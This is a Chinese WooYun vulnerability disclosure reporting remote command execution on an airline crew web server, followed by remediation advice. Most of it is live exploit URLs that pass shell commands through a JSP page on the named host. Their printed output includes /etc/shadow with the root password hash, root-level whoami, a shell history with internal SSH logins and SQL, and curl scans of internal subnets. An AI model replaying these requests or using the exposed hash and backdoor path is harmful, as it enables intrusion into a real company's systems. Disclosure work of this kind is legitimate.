乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-19: 细节已通知厂商并且等待厂商处理中 2016-04-19: 厂商已经确认,细节仅向厂商公开 2016-04-29: 细节向核心白帽子及相关领域专家公开 2016-05-09: 细节向普通白帽子公开 2016-05-19: 细节向实习白帽子公开 2016-06-03: 细节向公众公开
男女之间相处,男人要处处让着女人。就拿我来说,我做任何事就都让着女朋友,比如让她洗衣服,让她做饭,让她刷碗,让她收拾屋子……
http://crew.9air.com:8080/9airweb/allUserMap.actionstr2命令执行,少年该打补丁了。http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadowroot:$6$tt8sA3oimLmV/DQS$P2kOvG699Pl38HVdoxIU7z1BBJmTA5xjP87FS4T2VsCl42zq52UAhxhT1KyfGutLzjmZ5fZOmRFwr87CZyMlA.:16439:0:99999:7:::bin:*:15628:0:99999:7:::daemon:*:15628:0:99999:7:::adm:*:15628:0:99999:7:::lp:*:15628:0:99999:7:::sync:*:15628:0:99999:7:::shutdown:*:15628:0:99999:7:::halt:*:15628:0:99999:7:::mail:*:15628:0:99999:7:::uucp:*:15628:0:99999:7:::operator:*:15628:0:99999:7:::games:*:15628:0:99999:7:::gopher:*:15628:0:99999:7:::ftp:*:15628:0:99999:7:::nobody:*:15628:0:99999:7:::dbus:!!:16439::::::vcsa:!!:16439::::::rpc:!!:16439:0:99999:7:::rtkit:!!:16439::::::avahi-autoipd:!!:16439::::::abrt:!!:16439::::::rpcuser:!!:16439::::::nfsnobody:!!:16439::::::haldaemon:!!:16439::::::gdm:!!:16439::::::ntp:!!:16439::::::saslauth:!!:16439::::::postfix:!!:16439::::::pulse:!!:16439::::::sshd:!!:16439::::::tcpdump:!!:16439::::::clamav:!!:16829::::::
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoamiroot权限
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/binbootdevetchistory.loghomeliblib64logslost+foundmediamiscnetoptprocrootsbinselinuxserverdirshirodemo.logshirodemo.log.2016-01-29shirodemo.log.2016-01-30shirodemo.log.2016-01-31shirodemo.log.2016-02-01shirodemo.log.2016-02-02shirodemo.log.2016-02-03shirodemo.log.2016-02-04shirodemo.log.2016-02-05shirodemo.log.2016-02-06shirodemo.log.2016-02-07shirodemo.log.2016-02-08shirodemo.log.2016-02-09shirodemo.log.2016-02-10shirodemo.log.2016-02-11shirodemo.log.2016-02-12shirodemo.log.2016-02-13shirodemo.log.2016-02-14shirodemo.log.2016-02-15shirodemo.log.2016-02-16shirodemo.log.2016-02-17shirodemo.log.2016-02-18shirodemo.log.2016-02-19shirodemo.log.2016-02-20shirodemo.log.2016-02-21shirodemo.log.2016-02-22shirodemo.log.2016-02-23shirodemo.log.2016-02-24shirodemo.log.2016-02-25shirodemo.log.2016-02-26shirodemo.log.2016-02-27shirodemo.log.2016-02-28shirodemo.log.2016-02-29shirodemo.log.2016-03-01shirodemo.log.2016-03-02shirodemo.log.2016-03-03shirodemo.log.2016-03-04shirodemo.log.2016-03-05shirodemo.log.2016-03-06shirodemo.log.2016-03-07shirodemo.log.2016-03-08shirodemo.log.2016-03-09shirodemo.log.2016-03-10shirodemo.log.2016-03-11shirodemo.log.2016-03-12shirodemo.log.2016-03-13shirodemo.log.2016-03-14shirodemo.log.2016-03-15shirodemo.log.2016-03-16shirodemo.log.2016-03-17shirodemo.log.2016-03-18shirodemo.log.2016-03-19shirodemo.log.2016-03-20shirodemo.log.2016-03-21shirodemo.log.2016-03-22shirodemo.log.2016-03-23shirodemo.log.2016-03-24shirodemo.log.2016-03-25shirodemo.log.2016-03-26shirodemo.log.2016-03-27shirodemo.log.2016-03-28shirodemo.log.2016-03-29shirodemo.log.2016-03-30shirodemo.log.2016-03-31shirodemo.log.2016-04-01shirodemo.log.2016-04-02shirodemo.log.2016-04-03shirodemo.log.2016-04-04shirodemo.log.2016-04-05shirodemo.log.2016-04-06shirodemo.log.2016-04-07shirodemo.log.2016-04-08shirodemo.log.2016-04-09shirodemo.log.2016-04-10shirodemo.log.2016-04-11shirodemo.log.2016-04-12shirodemo.log.2016-04-13shirodemo.log.2016-04-14shirodemo.log.2016-04-15shirodemo.log.2016-04-16shirodemo.log.2016-04-17shirodemo.log.2016-04-18softsoftwaresrvsystmpusrvarweixin
有历史命令文件http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log这就好玩了.....414 select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 415 2015-12-09 16:16:56,603 DEBUG [java.sql.PreparedStatement] - {pstm-100145} Executing Statement: select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 416 [DEBUG] 2015-12-09 16:16:56,603 - {pstm-100145} Executing Statement: select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 3171526575 417 tail -f catalina.out sql之类的,留着,可能后期会用到....754 ssh [email protected] 756 ssh [email protected]内网貌似还蛮大的829 cd / 830 ls 831 cd /serverdir/ 832 ls 833 cd tomcat/ 834 ls 835 cd apache-tomcat-7.0.57/ 836 ls 837 cd webapps/ 838 ls 839 cd test/ 840 ls 841 cd .. 842 rm -rf test 843 ls 844 cd 9airweb 845 ls 846 cat return_url.jsp 847 ll 848 cat index_hd.jsp web目录在这里怎么安装了安全狗? 877 tar -zxvf safedog_linux64.tar.gz 878 ll 879 cd safedog_linux64 880 ls 881 python install.py 882 service safedog status 883 python install.py
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/shirodemo.log.2016-04-15都是数据库的log
看了下hosts,没有什么内网的ip,截止目前为止,之收集到两个ip段10.10.2.x192.168.34.x不过看样子应该内网很大。继续探测本想用find把你们目录文件全部列出来的...算了吧....直接用粗暴的方法去探测内网了curlhttp://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.25http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.31http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.14http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.15http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.17http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.42it wokes!http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.46http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.36http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.52/wechat/WEB-INF/web.xml 找到个没卵用的xml。写个小脚本去跑下。
1.打补丁;2.删除那个历史命令文件;3.检查系统日志,看看是否被骇客入侵;4.别客气,eq击飞空中吊打运维。
危害等级:高
漏洞Rank:10
确认时间:2016-04-19 17:06
暂无